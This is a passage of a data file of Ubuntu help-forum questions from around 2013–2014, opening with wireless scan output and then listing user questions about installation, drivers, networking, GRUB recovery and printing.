quality=70/70 signal level=10 dbm encryption key : off essid : '' btwifi '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 9 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=0000009594434036 extra : last beacon : 1692ms ago ie : unknown : 0006425457694669 ie : unknown : 010882848b960c121824 ie : unknown : 030101 ie : unknown : 2a0100 ie : unknown : 32043048606c ie : unknown : 2d1aac011bffff000000000000000000000000000000000000000000 ie : unknown : 3d1601001100000000000000000000000000000000000000 ie : unknown : 4a0e14000a002c01c800140005001900 ie : unknown : 7f0101 ie : unknown : dd180050f2020101890003a4000027a4000042435e0062322f00 ie : unknown : dd0900037f01010000ff7f cell 03 - address : 12 : ac:54 : ea : b0:92 channel:1 frequency:2.412 ghz ( channel 1 ) quality=63/70 signal level=-47 dbm encryption key : off essid : '' btwifi-with-fon '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 9 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=000000959442c180 extra : last beacon : 1724ms ago ie : unknown : 000f4254576946692d776974682d464f4e ie : unknown : 010882848b960c121824 ie : unknown : 030101 ie : unknown : 050401030000 ie : unknown : 2a0100 ie : unknown : 32043048606c ie : unknown : 2d1aac011bffff000000000000000000000000000000000000000000 ie : unknown : 3d1601001100000000000000000000000000000000000000 ie : unknown : 4a0e14000a002c01c800140005001900 ie : unknown : 7f0101 ie : unknown : dd180050f2020101890003a4000027a4000042435e0062322f00 cell 04 - address : 00 : ac:54 : ea : b0:92 channel:1 frequency:2.412 ghz ( channel 1 ) quality=70/70 signal level=10 dbm encryption key : on essid : '' bthub3-h4c3 '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 9 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=0000009594424f37 extra : last beacon : 1700ms ago ie : unknown : 000b4254487562332d48344333 ie : unknown : 010882848b960c121824 ie : unknown : 030101 ie : unknown : 2a0100 ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : unknown : 32043048606c ie : unknown : 2d1aac011bffff000000000000000000000000000000000000000000 ie : unknown : 3d1601001100000000000000000000000000000000000000 ie : unknown : 4a0e14000a002c01c800140005001900 ie : unknown : 7f0101 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : unknown : dd180050f2020101890003a4000027a4000042435e0062322f00 ie : unknown : dd0900037f01010000ff7f ie : unknown : dda70050f204104a000110104400010210570001001041000100103b00010310470010565aa94967c14c0eaa8ff349e6f5931110210002425410230017486f6d652048756220332e30204d756c7469204d6f646510240010425420486f6d652048756220332e3041104200122b3035383732302b313231393031333633311054000800060050f204000110110010425420486f6d652048756220332e3041100800020084103c000101 cell 05 - address : 7c:4c : a5:2f : e0:11 channel:6 frequency:2.437 ghz ( channel 6 ) quality=60/70 signal level=-50 dbm encryption key : on essid : '' sky37ac9 '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=00000005228d7ac7 extra : last beacon : 76ms ago ie : unknown : 0008534b593337414339 ie : unknown : 010882848b962430486c ie : unknown : 030106 ie : unknown : 2a0100 ie : unknown : 2f0100 ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : 32040c121860 ie : unknown : 2d1aec181bffff000000000000000000000000000000000000000000 ie : unknown : 3d1606080000000000000000000000000000000000000000 ie : unknown : dd800050f204104a0001101044000102103b000103104700105798f8620325a8e730d0d990fc0834191021000842726f6164636f6d1023000842726f6164636f6d1024000631323334353610420004313233341054000800060050f20400011011000a42726f6164636f6d415010080002200c103c0001011049000600372a000120 ie : unknown : dd090010180200f02c0000 ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 cell 06 - address : 7c:03:4c : a7 : d8 : a8 channel:6 frequency:2.437 ghz ( channel 6 ) quality=60/70 signal level=-50 dbm encryption key : on essid : '' sky7d8a7 '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=000000576e3dae0d extra : last beacon : 72ms ago ie : unknown : 0008534b593744384137 ie : unknown : 010882848b962430486c ie : unknown : 030106 ie : unknown : 2a0104 ie : unknown : 2f0104 ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : unknown : 32040c121860 ie : unknown : 2d1afc181bffff000000000000000000000000000000000000000000 ie : unknown : 3d1606001500000000000000000000000000000000000000 ie : unknown : dd760050f204104a0001101044000102103b00010310470010ea05f98f66daaa215d3a6f92626310b81021000842726f6164636f6d1023000842726f6164636f6d1024000631323334353610420004313233341054000800060050f20400011011000a42726f6164636f6d4150100800020084103c000101 ie : unknown : dd090010180204f02c0000 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 cell 07 - address : 30:46:9a:7c:1e:14 channel:11 frequency:2.462 ghz ( channel 11 ) quality=70/70 signal level=10 dbm encryption key : on essid : '' virginmedia8250852 '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=000000933dba269e extra : last beacon : 28ms ago > > uname -r -m 3.11.0-15-generic x86_64 > > cat /etc/network/interfaces # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback > > nm-tool networkmanager tool state : connected ( global ) - device : wlan0 [ sky12795 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : rtl8192cu state : connected default : yes hw address : 10 : fe : ed:17:55:9a capabilities : speed : 72 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) sky37ac9 : infra , 7c:4c : a5:2f : e0:11 , freq 2437 mhz , rate 54 mb/s , strength 94 wpa2 btwifi : infra , 02 : ac:54 : ea : b0:92 , freq 2412 mhz , rate 54 mb/s , strength 10 btwifi-with-fon : infra , 12 : ac:54 : ea : b0:92 , freq 2412 mhz , rate 54 mb/s , strength 10 virginmedia8250852 : infra , 30:46:9a:7c:1e:14 , freq 2462 mhz , rate 54 mb/s , strength 10 wpa wpa2 talktalk-6a9669 : infra , 00:26 : b6:6a:96:69 , freq 2412 mhz , rate 54 mb/s , strength 60 wpa wpa2 btbusinesshub-170_ext : infra , 9c : d3:6d : a7:71:9e , freq 2412 mhz , rate 54 mb/s , strength 60 wpa wpa2 sky7d8a7 : infra , 7c:03:4c : a7 : d8 : a8 , freq 2437 mhz , rate 54 mb/s , strength 82 wpa wpa2 talktalk-c2f5b0 : infra , 90:94 : e4 : c2 : f5 : b0 , freq 2452 mhz , rate 54 mb/s , strength 10 wpa wpa2 fowza-at-home-wireless : infra , 00:26 : f2:50 : fc:18 , freq 2437 mhz , rate 54 mb/s , strength 62 wpa wpa2 *sky12795 : infra , 7c:4c : a5:7e : f0 : ed , freq 2437 mhz , rate 54 mb/s , strength 72 wpa2 ipv4 settings : address : 192.168.0.11 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.0.1 dns : 192.168.0.1 - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : unavailable default : no hw address : bc : ee:7b:5c : b8:11 capabilities : carrier detect : yes wired properties carrier : off > > sudo rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : no
401051	i want to install ubuntu but will i be able to go back to windows ?	i have a new laptop and i want to install ubuntu on it , i would just like to know if there 's any way i 'll be able to go back to windows or run two operating systems at once .
401055	error in accessing windows file ( present in shared folder ) from ubuntu [ coding ]	i am a linux newbie and have been writing an app to transfer files from any shared locations on the network . whether its windows or linux hosting the shared folder/files and my app running on windows or linux trying to download/upload a file . i wanted to achieve platform independence and thus wrote the app in c # , i run the app over mono which takes care of the platform below . the real problem i am facing is when my app runs on linux and tries to access a file present in a shared folder on windows . i use functions from libsmbclient.so to do my operations . http : //www.opensource.apple.com/source/samba/samba-26/source/include/libsmbclient.h in order to copy files from a windows shared folder , i think i need to mount the windows drive in linux , but my application would not have root creds on the linux box . i may have the access creds for the windows shared folder though . is there some code to snippet that i could include in my solution that would mount the folder without using additional libraries ? or another question that could solve my problem is how to simulate `` ubuntu desktop '' -- > `` connect to server '' -- > type : '' windows share '' and that whole domain/username/password activity through code ? thanks in advance
401056	data recovery from a ntfs formatted disk	while installing ubuntu , by mistake i gave my c drive as the swap space . it ended up formatting the logical drive ( e , but not c ! ) . i realised my mistake in the middle and forcefully ended installation . however it formatted the disk . on windows , the disk space appears to be unallocated . is there a way i can recover the data ?
401062	cuda ubuntu 13.10	i 'd love to know if anybody got success to use cuda on saucy . i installed it using apt-get , but can not really understand how to make it work . sudo apt-get install nvidia-cuda-dev nvidia-cuda-dev nvidia is giving doc but for previous versions of ubuntu , things are kind of different for saucy . any helps is warmly welcome .
401064	temporary static ip/link local address	i assigned a temporary ip address to my eth0 interface using this command sudo ifconfig eth0 169.254.1.1 netmask 255.255.0.0 as described here it works fine , when i do ifconfig it shows the newly assigned ip address . eth0 link encap : ethernet hwaddr 5c:26:0a:4f:32:11 inet addr:169.254.1.1 bcast:169.254.255.255 mask:255.255.0.0 inet6 addr : fe80 : :5e26 : aff : fe4f:3211/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:774 errors:0 dropped:0 overruns:0 frame:0 tx packets:1160 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:170598 ( 170.5 kb ) tx bytes:218967 ( 218.9 kb ) interrupt:20 memory : f6900000-f6920000 i expected this ip address should hold until i flush it out . but soon afterwards it is reset eth0 link encap : ethernet hwaddr 5c:26:0a:4f:32:11 inet6 addr : fe80 : :5e26 : aff : fe4f:3211/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:784 errors:0 dropped:0 overruns:0 frame:0 tx packets:1202 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:174678 ( 174.6 kb ) tx bytes:228013 ( 228.0 kb ) interrupt:20 memory : f6900000-f6920000 i only need this ip address temporarily and rather not change my /etc/network/interfaces which reads auto lo iface lo inet loopback i am on 12.04 , any suggestion would be helpful thanks update this is my motive . i want to transfer some large files over ethernet . i have laptops with gigabit capable adapters but slow routers . when both machines are windows i can simply hook them up with a network cable and after some time when they dont find a dhcp server they revert to link-local address of range 169.254.x.x/16 and file transfers would just work . unfortunately in ubuntu this does not happen . i have to manually set an ip address . then the machines can ping each other and can transfer files , but only for a short interval of time . one thing i can do is keep issuing sudo ifconfig eth0 ... every 30 secs or so to keep things working but this is pretty annoying . i have to do this kind of transfers quite frequently so would rather not take the hassle of modifying etc/network/interfaces everytime .
401065	after login no window borders , sidebar or task bar - 13.10 nvidia	lenovo w530 ( nvidia ) 13.10 64bit - after some updates and a reboot . now just after normal login i log in i have no window borders , no sidebar or task bar . have tried remove/purging and reinstall of xorg/desktop/unity/nvidia drivers . been working fine for many months . tried nouveau and nvidia-331 drivers . unity works if i set bios to integrated graphics . need discrete ( nvidia ) graphics enabled to support external monitors .
401070	firefox not working as expected	when i click on a ink to open a website , i get an `` allow '' button from firefox , never have seen this before , i went into edit preferences , and i do n't see anything . how do i get rid of this ? ? ?
401072	touchpad sometimes not working after click on thinkpad t440s	i have brought a thinkpad t440s from lenovo and installed ubuntu 13.10 on it . it works good , but there is one big issue : often the mouse freezes after a click for a few seconds and sometimes the mouse freezes forever until i remove the psmouse module and re-add it : sudo modprobe -r psmouse sudo modprobe psmouse after that the touchpad starts working again normally , if it is still frozen i have to reboot the laptop . i am not sure , but could that be a problem with the driver ? here is interesting part of the dmesg output : [ 531.369723 ] psmouse serio1 : bad data from kbc - timeout [ 531.386334 ] psmouse serio1 : touchpad at isa0060/serio1/input0 lost sync at byte 1 [ 531.388140 ] psmouse serio1 : bad data from kbc - timeout [ 531.396685 ] psmouse serio1 : bad data from kbc - timeout [ 531.399687 ] psmouse serio1 : touchpad at isa0060/serio1/input0 lost sync at byte 4 [ 531.400798 ] psmouse serio1 : touchpad at isa0060/serio1/input0 lost sync at byte 1 [ 531.407985 ] psmouse serio1 : touchpad at isa0060/serio1/input0 - driver resynced . [ 920.895669 ] psmouse serio1 : touchpad at isa0060/serio1/input0 lost sync at byte 1 [ 920.908302 ] psmouse serio1 : touchpad at isa0060/serio1/input0 - driver resynced . [ 1116.953171 ] psmouse serio1 : bad data from kbc - timeout [ 1117.204120 ] psmouse serio1 : touchpad at isa0060/serio1/input0 lost sync at byte 1 [ 1117.205379 ] psmouse serio1 : touchpad at isa0060/serio1/input0 lost sync at byte 1 [ 1117.206550 ] psmouse serio1 : touchpad at isa0060/serio1/input0 lost sync at byte 1 [ 1117.207728 ] psmouse serio1 : touchpad at isa0060/serio1/input0 lost sync at byte 1 [ 1117.208919 ] psmouse serio1 : touchpad at isa0060/serio1/input0 lost sync at byte 1 [ 1117.208929 ] psmouse serio1 : issuing reconnect request [ 1173.743451 ] psmouse serio1 : bad data from kbc - timeout [ 1173.974331 ] psmouse serio1 : touchpad at isa0060/serio1/input0 lost sync at byte 4 [ 1173.975528 ] psmouse serio1 : touchpad at isa0060/serio1/input0 lost sync at byte 1 [ 1173.976673 ] psmouse serio1 : touchpad at isa0060/serio1/input0 lost sync at byte 1 [ 1173.977828 ] psmouse serio1 : touchpad at isa0060/serio1/input0 lost sync at byte 1 [ 1173.979044 ] psmouse serio1 : touchpad at isa0060/serio1/input0 lost sync at byte 1 [ 1173.979054 ] psmouse serio1 : issuing reconnect request [ 1231.478893 ] psmouse serio1 : touchpad at isa0060/serio1/input0 lost synchronization , throwing 3 bytes away . [ 1308.995128 ] psmouse serio1 : bad data from kbc - timeout [ 1457.439552 ] psmouse serio1 : bad data from kbc - timeout [ 1820.123546 ] psmouse serio1 : touchpad at isa0060/serio1/input0 lost sync at byte 4 [ 1820.124699 ] psmouse serio1 : touchpad at isa0060/serio1/input0 lost sync at byte 1 [ 1820.125855 ] psmouse serio1 : touchpad at isa0060/serio1/input0 lost sync at byte 1 [ 1820.127023 ] psmouse serio1 : touchpad at isa0060/serio1/input0 lost sync at byte 1 [ 1820.128171 ] psmouse serio1 : touchpad at isa0060/serio1/input0 lost sync at byte 1 [ 1820.128182 ] psmouse serio1 : issuing reconnect request can somebody help me ?
401073	nvidia not working after most recent update	i updated today ( 06 jan 2014 ) , and x11 failed to boot . i tried running startx from a terminal login , and noted that it said that there were no screens found . i trued running nvidia-xconfig , and this failed to resolve the issue . i deleted /etc/x11/xorg.conf , and this got my system up and running on the sucky on-board video , but then trying to re-enable the nvidia card failed . i tried using nvidia-settings , i tried re-installing the driver , i tried rolling it back . none of the above worked . i am running xubuntu 13.10-x64 on an intel core i7-2600 cpu @ 3.40ghz , 8 gb ram , most recent updates installed ( in fact , that 's what broke things ) .
401074	problem loading the network driver	hi i 'm new to linux so pardon me if my questions seem foolish . i wanted to install ubuntu server 12.04 on a machine ( server ) . unfortunately it would not boot from the usb installation . so i installed ubuntu server 12.04 on a hard disk using another machine ( desktop ) with an internet connection . everything went well and after the initial boot up i installed the gui as well . i then shifted the hard disk from the desktop to the server and booted the system . all was well till i tried to use the internet . apparently the driver was wrong . i managed to install the driver but when i use the ifconfig ethx up command i get the error - siocsifflags : operation not permitted any suggestions please ? thanks .
401075	macbook air mid 2012 fan control on ubuntu 13.10 and higher	on my macbook air mid 2012 i use ubuntu since 12.04 . after installing ubuntu i had to install the `` macfanctld '' package ( incl . configuration ) to get the fan control of my mba working . if not , the fan ( exhaust ) stays always on the minimum = 2000 rpm ( maximum = 6000 rpm ) . the ppa has only an update for ( raring ) ubuntu 13.04 . i asked the author of the package a view months ago if there is an 13.10 update planned , but i did not received an answer . here is the link to the ppa : https : //launchpad.net/~mactel-support/+archive/ppa ? field.series_filter=raring : it contains only a package for raring and not for saucy . i installed the 13.04 package on my ubuntu 13.10 but i am not sure if i should install the `` old '' package ? ? on 13.10 i installed it with the following commands : sudo tee -a /etc/apt/sources.list < < -eof deb http : //ppa.launchpad.net/mactel-support/ppa/ubuntu raring main deb-src http : //ppa.launchpad.net/mactel-support/ppa/ubuntu raring main eof sudo apt-get install macfanctld here is the link to the full script for 12.10 : http : //www.maketecheasier.com/install-ubuntu-12-10-in-macbook-air/ ( see # 6 ) is this package not necessary any more for ubuntu 13.04 and higher ? ?
401076	how to create unity launcher for shotwell photo viewer	the best piece of software for simple cropping of images seems ( to me ) to be shotwell photo viewer , especially as i find gimp 's cropping methods ( autocropping & zealous cropping ) incomprehensible . i can start shotwell photo viewer by right clicking the image file ( in nautilus ) . however , there are 2 desktop configuration files for shotwell & 1 for shotwell viewer , all loading shotwell photo manager . i also do n't see any shell script or executable for shotwell photo viewer . can anybody supply a desktop configuration file for sshotwell photo viewer ? alternatively , can anybody point me to the shell script or executable for shotwell photo viewer ( in the ubuntu precise file system ) ?
401079	install ubutu on new hdd	can i install ubuntu on a new laptop hdd . can i then run programs like adobe photoshop for windows 7 without having to install windows . i have only ever been a windows user and know nothing about ubuntu . any info on installing from 'scratch ' would be helpful , and also is ubuntu suitable for the casual user . how will the various drivers be affected .
401080	when and will it be another ubuntu version soon ?	will it come out a new version of ubuntu ? and when can we expect somthing new ? saw that linux mint has come out with some new features : )
401082	problem while creating desktop shortcuts from ubuntu-tweek	i followed the below steps to create desktop shortcuts . sudo add-apt-repository ppa : tualatrix/ppa sudo apt-get update sudo apt-get install ubuntu-tweak ubuntu-tweak after installation of ubuntu-tweak i clicked admin -- > personal -- > scripts -- > create launcher but it is not working
401083	how to avoid creation of efi system partition during installation ?	i am installing ubuntu 12.04 . after creating partition it prompts for a partition for efi . i do not want any such partition and have old mbr thing . how to do this ?
401089	ubuntu 13.10 does n't boot up after successful installation	installed ubuntu first time on my pc . flashed it on my flash-drive , ran it on my computer and decided to install , after successful installation computer restarts and i only see white line on black blank screen . again boot from flash drive , run installation and face the same problem . computer specifications : cpu : intel core i5-2310 2.90ghz motherboard : msi ms-7732 ram : ddr3 , 4096 мб ( 2х 2048 мб ) hdd : samsung hd161hj ( 149 гб ) gpu : nvidia geforce gts 450
401093	do i have to format usb for booting if its fat32 already ?	i dont really have a pc to download universal usb installer . the only devices i have are : fat32 usb my smartphone a ubuntu with a failed update that makes og unable to use or open download files . it can however open and use terminal nut i dont understand how to format it through terminal
401094	how can do you install ubuntu onto a blank computer using a usb ?	i wiped my computer and need to install an os . unfortunately my computer does not have a cd drive so i need to boot from a usb . how do you do this ?
401095	system recovery	i am putting together a media and print server using ubuntu 12.04 server . i have two hard drives in the computer ( 8 and 120 gb ) . presently , the server software is running on the larger drive . how would i download the iso image from the download site to the smaller drive and set this up to use for system recovery , similar to what is done with windows systems , as a recovery partition ? additionally , could i save the server setup ( again , maybe as an iso image ) , once completed , to recover the system as a complete media and print server ?
401096	how to remove package that gives error on remove ?	i 'm trying to install ocenaudio32bits . the 64bits version was installed but was preventing me from installing skype . so when skype was installed the 64bit version of ocenaudio was also removed , but when i try to install the 32 bits it responds with : root @ hadrian-pc : /home/hadrian/downloads # dpkg -i ocenaudio32.deb dpkg : error processing ocenaudio32.deb ( -- install ) : ocenaudio : i386 2.0.0-5720 ( multi-arch : no ) is not co-installable with ocenaudio : amd64 2.0.0-5720 ( multi-arch : no ) which is currently installed errors were encountered while processing : ocenaudio32.deb root @ hadrian-pc : /home/hadrian/downloads # if i try dpkg -r ocenaudio it returns : root @ hadrian-pc : /home/hadrian/downloads # dpkg -r ocenaudio ( reading database ... 194296 files and directories currently installed . ) removing ocenaudio ... /var/lib/dpkg/info/ocenaudio.postrm : 4 : [ : missing ] rm : can not remove `/usr/bin/ocenaudio ' : no such file or directory dpkg : error processing ocenaudio ( -- remove ) : subprocess installed post-removal script returned error exit status 1 errors were encountered while processing : ocenaudio root @ hadrian-pc : /home/hadrian/downloads # i 've tried the other removal methods lik purge and purge remove , but nothing works . is there a way to remove ocenaudio from the installed packages list ? or another resolution to this ? ubuntu 12.04 3.8.0-27-generic ( elementary os luna )
401100	ping through gre tunnel dicarded between 2 interfaces of a router - ping does not reach subnet	i have an interesting issue that i hope someone can help with . i am trying to create a gre tunnel between 2 routers ( running linux ubuntu 12.04 ) and pass traffic between 2 subnets trough this tunnel . what i am trying to achieve can be simplified by the following setup , imagine 4 computers ( as the following diagram will show ) , 2 are routers , 2 are pc 's connected to a gateway ... ======| -- -- -- -- -- -- -- -- -- -- -- |=============| -- -- -- -- -- -- -- -- -- -- -- | suba -- + -- eth0 eth1 -- +=============+ -- eth0 eth1 -- + -- subb ======| -- -- -- -- -- -- -- -- -- -- -- |=============| -- -- -- -- -- -- -- -- -- -- -- | pc1 as router pc2 as router now if the diagram is looking wrong , let me explain it . i have 2 pc 's configured as routers ( ip_forwarding=1 , proxy_arp=1 ) . each pc as router has 2 interfaces and each interface has its own ip . left side of the diagram ( pc1 as router ) suba=192.165.13.25 eth0 on pc1 as router =192.165.13.254 ( gw of suba ) eth1 on pc1 as router = 192.168.6.40 ( address as provided by service provider ) - > this is the default gw of the pc1 as router . right side of the diagram ( pc2 as router ) subb=192.160.20.25 eth0 on pc2 as router =192.168.20.41 ( address as provided by service provider ) eth1 on pc2 as router =192.160.20.254 ( gw of subb ) the routing is pretty simple on each end and can be described by words on pc1 as router : to access 192.165.13.0/24 use eth0 to access 192.168.6.0/24 use eth1 default gw is 192.168.6.40 = > this is eth1 on pc2 as router : to access 192.160.20.0/24 use eth1 to access 192.168.20.0/24 use eth0 default gw is 192.168.20.41 = > this is eth0 in this setup , without any additional iptables rules , everyone can ping everyone . and i am good.suba can ping subb and the other way around is also ok. now i am creating a gre tunnel between pc1 as router eth1 and pc2 as router eth0 tunnel on pc1 as router has gre tunnel with local = 192.168.6.40 and remote = 192.168.20.41 and of course i have the symmetry on the other router with tunnel on pc2 as router has gre tunnel with local = 192.168.20.41 and remote = 192.168.6.40 ... i modify the routing ( add one rule ) on pc2 as router just to force traffic into the tunnel : to access 192.165.13.0/24 use the gre tunnel . nothing else is done . now subb is trying to ping suba and it does not work , does not work either trying to ping the gw of suba ( which is the second interface of pc1 as router ) here is what i see using wireshark or tcpdump : 1 ) traffic gets in the tunnel interface on pc2 as router 2 ) traffic gets out of the tunnel interface on pc1 as router 3 ) traffic never gets to the eth0 interface of pc1 as router . so i dug deeper and added several rules in the ip tables to see what was happening : each ping request is counted in : mangle prerouting nat prerouting but ping is not counted in neither mangle forward ( if trying to forward to suba ) or mangle input . it seems that the kernel silently discard the packet in the routing and i have no idea why . in my opinion , i should not have to modify iptables as i did not need to before the gre tables was created ... any help on what might be happening , how to get the kernel to report the packet or the reason of why it is discarded would be highly appreciated .
401101	dual -boot in efi partition	i have an efi partition which i found in /boot . it has two folder efi and grub . efi folder has efi/microsoft . eventhough i have this i do not have windows listed in grub menu at startup . how can i get windows listed in initial grub menu ?
401102	ar9485 biiiig problem	i really need help guys , i have a samsung np300e5x , with wireless hardware ath9k ar9485 , , i am different of all the problems i read , mine work really fine , and connect easily to wifi routers , but i ca n't use it at all with wireshark or aircrack it shows : interface chipset driver wlan0 ath9k - [ phy0 ] so it like it can see but ca n't use , , , plz anyone help me , i passed 1 whole week trying to solve this problem and i tried all the solutions i saw thx in advance
401105	elf header smaller than expected	i have a dell xmp-13 ultrabook ( ssd drive only ) with 12.04 installed dualboot with the original windows . it has been running flawlessly for many many months . today in the middle of a system update ( kernel ) i accidentally put it in suspend mode . then it got frozen whenever i tried to boot . i then booted in a previous ubuntu version and the partial upgrade dialog box appeared . i started it and the computer got frozen again . now it stops in the dell logo screen with the message : error : elf header smaller than expected . grub rescue > _ i did some research and tried to find the linux images as suggested in this answer : recovering from 'grub rescue > ' crash however i always get the error : no such partition . when trying to ls on the drives : grub rescue > ls ( hd0 ) ( hd0 , gtp10 ) ( hd0 , gtp9 ) ( hd0 , gtp8 ) ( hd0 , gtp7 ) ( hd0 , gtp6 ) ( hd0 , gtp5 ) ( hd0 , gtp4 ) ( hd0 , gtp3 ) ( hd0 , gtp2 ) ( hd0 , gtp1 ) grub rescue > ls ( hd0 , gtp1 ) error : no such partition . grub rescue > ls ( hd0 , gtp1 ) /boot error : no such partition . this is the same for all drive numbers with and without the `` /boot '' any idea of what should i try ?
401106	how do you get ubuntu for android via windows 7	i personally think that ubuntu touch is a great idea , but there is a problem with it : as far as i can tell , ubuntu for android ca n't be installed unless you have ubuntu on a computer . and my pc runs microsoft windows . i 've tried the commands that are listed on the site , and nothing has happened . so someone please explain how to get ubuntu for android via windows 7/8 .
401107	ubuntu server 12.04 problem - switch to desktop or upgrade to 13.10 ?	we are running ubuntu server 12.04 , and we 've also installed of the all the required packages ( ubuntu-desktop etc . ) to enable users to use a desktop when connecting to our server . we 've encountered the following problem : some special key combinations , such as super+ctrl , alt+tab , etc . just don't work . we 've read many how-to 's and posts , checked many different options , including the options of the vnc client we use , installing compiz to enable these key combinations , and more . we also removed the desktop and re-installed it . nothing seems to work . we 've read that this is a known bug in ubuntu 12.04 ( see here and here ) . we 've come to the conclusion that we have 2 options : 1 . upgrade to ubuntu 13.10 and hope this solves the issue . 2 . re-install our server as ubuntu 12.04 desktop ( it is used mostly by users who need the gui ) . we would love to hear about any other simpler option that would not involve a major downtime for our server . thank in advance !
401110	graphics card with hdmi sound and video output for movies	i 've got a desktop with a 2x pentium dual-core cpu e5200 @ 2.50ghz and 2gb ram . i am running ubuntu 12.04.3 lts , and a plasma tv with hdmi input . i would like to get a graphics card with hdmi video output and 5.1 surround audio to connect it to my plasma tv and a 5.1 sound system just to watch movies ( no games ) . i do n't want to be messing compiling drivers and depending on small things to get the system working , just keep it simple . which graphics card do you advice ? thanks .
401111	fresh install on a new ssd , black screen on boot	trying to install 13.10 on a new asus ux302la . i changed the from the original 750gb hdd ( which comes with win8 ) , to an empty 256gb ssd . when i choose to install ubuntu , i only get a black screen , and the ubuntu boot sound . and nothing more . i 've tried all kinds of solutions , but i just cant get the screen working . i am not gon na dual boot , i 'm just trying to get a ubuntu up and running . any ideas ?
401114	which is the best pdf metadata viewer for ubuntu ?	there are a lot of questions and answers regarding the best pdf viewer available with ubuntu . but i want to parse the pdf file and know details of pdf , such as images , fonts and links that are available in a given pdf file . are there any pdf metadata viewers available ?
401115	graphics card low graphics mode errors	two days ago i updated my system . one of the updates was the nvidia driver . while updating it asked me if i wanted to update some config file as well . it told me the recommended thing to do was to update this config file . usually i never do so , but i did agree to upgrade those config files . today i started my pc and was greeted with this message : after that i got a message box with the following options : what information would you like to review ? ⠀ □ review the xserver log file □ review the startup errors □ edit configuration file i tried to run it in low graphics mode , but there was no result . then i tried to reinstall nvidia 331 drivers , but i had the same problem , nothing changed . so does anyone know what can be done here ?
401116	is a desktop needed to set up a private cloud ?	i installed ubuntu server 13.10 ftp and sftp server work ok ssh via terminal works as well no desktop - only terminal input / output now i want to install a private cloud - with calendar and contact synchronization . what are the best next steps ? do i need the unity-desktop ? if yes , how can i install it from within the server ? - and then ? if not , i would need the terminal commands to proceed . all of what i read so far , required a desktop best regards
401118	how to point $ home/.dmrc to new partition preserving 644	have mint and windows dual booted however when i attempt to point mint ( or ubuntu 13.10 for that matter ) to the ntfs common /home i get $ home/.dmrc ignore error how to fix or is there another filesystem that both can read natively as i move files back and forth alot ... does n't seem to affect anything else ( that i can tell but popup at boot is becoming annoying as is my lack of knowledge to fix )
401119	should i set up my cups printing to use ipp , lpd or url ?	when i got to add a network printer , i 'm always confronted with the same dilemma : do i set up the printer via ipp , lpd , or using it 's ip address ( appsocket/jetdirect ? ) and why ? what are the advantages and disadvantages of each ? how is ipp different from the ip address option ? if i chose ipp will that prevent me from the need to re-add the printer if the the ip address changes ? there 's a similar question here with vague answers : what 's the difference between the various printer connections ? here 's a screen shot of the ip style configuration from the kubuntu set-up wizard :
